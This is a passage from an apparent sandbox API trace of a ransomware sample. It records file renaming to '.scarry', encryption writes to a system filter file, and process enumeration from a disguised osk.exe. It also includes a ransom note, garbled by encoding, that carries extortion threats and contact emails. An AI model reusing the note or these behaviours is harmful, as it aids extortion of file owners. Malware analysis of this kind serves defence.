Files\\Common Files\\Microsoft Shared\\GRPHFLT\\SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\svg0nemyvfelxl1tdk=zzw0vmjeejo9p.scarry")) returned 1 [0111.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\svg0nemyvfelxl1tdk=zzw0vmjeejo9p.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.466] SetFileTime (hFile=0x19c, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0111.466] CloseHandle (hObject=0x19c) returned 1 [0111.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\SvG0NemYVfELxl1tDK=ZzW0vMjeeJo9P.scarry", dwFileAttributes=0x20) returned 1 [0111.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0111.467] GlobalLock (hMem=0x450004) returned 0x591988 [0111.487] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.487] GlobalUnlock (hMem=0x450004) returned 0 [0111.487] GlobalLock (hMem=0x450004) returned 0x591988 [0111.487] GlobalLock (hMem=0x45000c) returned 0x593998 [0111.487] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.487] GlobalUnlock (hMem=0x450004) returned 0 [0111.487] GlobalHandle (pMem=0x593998) returned 0x45000c [0111.487] GlobalUnlock (hMem=0x45000c) returned 0 [0111.487] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.487] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.487] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe872300, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfe872300, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe872300, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0111.488] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0111.488] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0111.488] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0111.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.488] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.489] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.489] ReadFile (in: hFile=0x19c, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0111.489] CloseHandle (hObject=0x19c) returned 1 [0111.489] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0111.489] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0111.489] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0111.489] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.489] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.489] GlobalUnlock (hMem=0x45000c) returned 0 [0111.489] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.489] GlobalLock (hMem=0x450004) returned 0x593998 [0111.489] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.490] GlobalUnlock (hMem=0x45000c) returned 0 [0111.490] GlobalHandle (pMem=0x593998) returned 0x450004 [0111.490] GlobalUnlock (hMem=0x450004) returned 0 [0111.490] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0111.490] CharLowerBuffW (in: lpsz="EPSIMP32.FLT", cchLength=0xc | out: lpsz="epsimp32.flt") returned 0xc [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.490] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.491] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0111.501] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", lpUsedDefaultChar=0x0) returned 67 [0112.026] CharLowerBuffW (in: lpsz=".FLT", cchLength=0x4 | out: lpsz=".flt") returned 0x4 [0112.026] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".flt", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".fltShared\\GRPHFLT\\EPSIMP32.FLT", lpUsedDefaultChar=0x0) returned 4 [0112.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 0x58b060 [0112.027] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0112.027] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0112.027] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0112.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", dwFileAttributes=0x20) returned 1 [0112.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0112.027] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0112.027] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0xadf90 [0112.028] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0112.028] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0112.116] GlobalLock (hMem=0x450004) returned 0x591988 [0112.116] GlobalLock (hMem=0x45000c) returned 0x597998 [0112.116] GlobalHandle (pMem=0x597998) returned 0x45000c [0112.116] GlobalUnlock (hMem=0x45000c) returned 0 [0112.116] GlobalReAlloc (hMem=0x45000c, dwBytes=0x4000, uFlags=0x2) returned 0x45000c [0112.116] GlobalLock (hMem=0x45000c) returned 0x597998 [0112.116] GlobalHandle (pMem=0x597998) returned 0x45000c [0112.116] GlobalUnlock (hMem=0x45000c) returned 0 [0112.116] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0112.116] GlobalLock (hMem=0x45000c) returned 0x597998 [0112.117] GlobalHandle (pMem=0x591988) returned 0x450004 [0112.117] GlobalUnlock (hMem=0x450004) returned 0 [0112.119] GlobalHandle (pMem=0x597998) returned 0x45000c [0112.119] GlobalUnlock (hMem=0x45000c) returned 0 [0112.119] GlobalLock (hMem=0x45000c) returned 0x591988 [0112.120] GlobalHandle (pMem=0x591988) returned 0x45000c [0112.120] GlobalUnlock (hMem=0x45000c) returned 0 [0112.120] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0112.120] GlobalLock (hMem=0x45000c) returned 0x591988 [0112.120] GlobalHandle (pMem=0x591988) returned 0x45000c [0112.120] GlobalUnlock (hMem=0x45000c) returned 0 [0112.120] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e4d270, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d270*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0112.282] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x0 [0112.283] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0112.283] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=712592, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0xadf90 [0112.283] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e4d270*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d270*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0112.306] WriteFile (in: hFile=0x1a4, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0112.307] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d18*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d18*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 Thread: id = 13 os_tid = 0x71c Thread: id = 14 os_tid = 0x23c Thread: id = 16 os_tid = 0x5cc [0060.507] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.507] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.507] GlobalUnlock (hMem=0x450004) returned 0 [0060.507] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.507] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.507] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.507] GlobalUnlock (hMem=0x450004) returned 0 [0060.507] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.507] GlobalUnlock (hMem=0x45000c) returned 0 [0060.507] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x292fd18, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x35 [0060.508] CharLowerBuffW (in: lpsz="osk.exe", cchLength=0x7 | out: lpsz="osk.exe") returned 0x7 [0060.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="osk.exe", cchWideChar=7, lpMultiByteStr=0x292ef20, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osk.exe", lpUsedDefaultChar=0x0) returned 7 [0060.508] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0060.508] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x76dc5b53 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0060.509] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32Next") returned 0x76dc5c3f [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0060.510] GetProcAddress (hModule=0x76d30000, lpProcName="Module32NextW") returned 0x76d67d96 [0060.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0060.518] Process32First (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.519] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.520] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.520] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.521] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.522] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.523] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.523] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.524] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.525] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0060.526] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.526] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.527] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.528] Process32Next (in: hSnapshot=0x17c, lppe=0x292fdf3 | out: lppe=0x292fdf3*(dwSize=0x128, 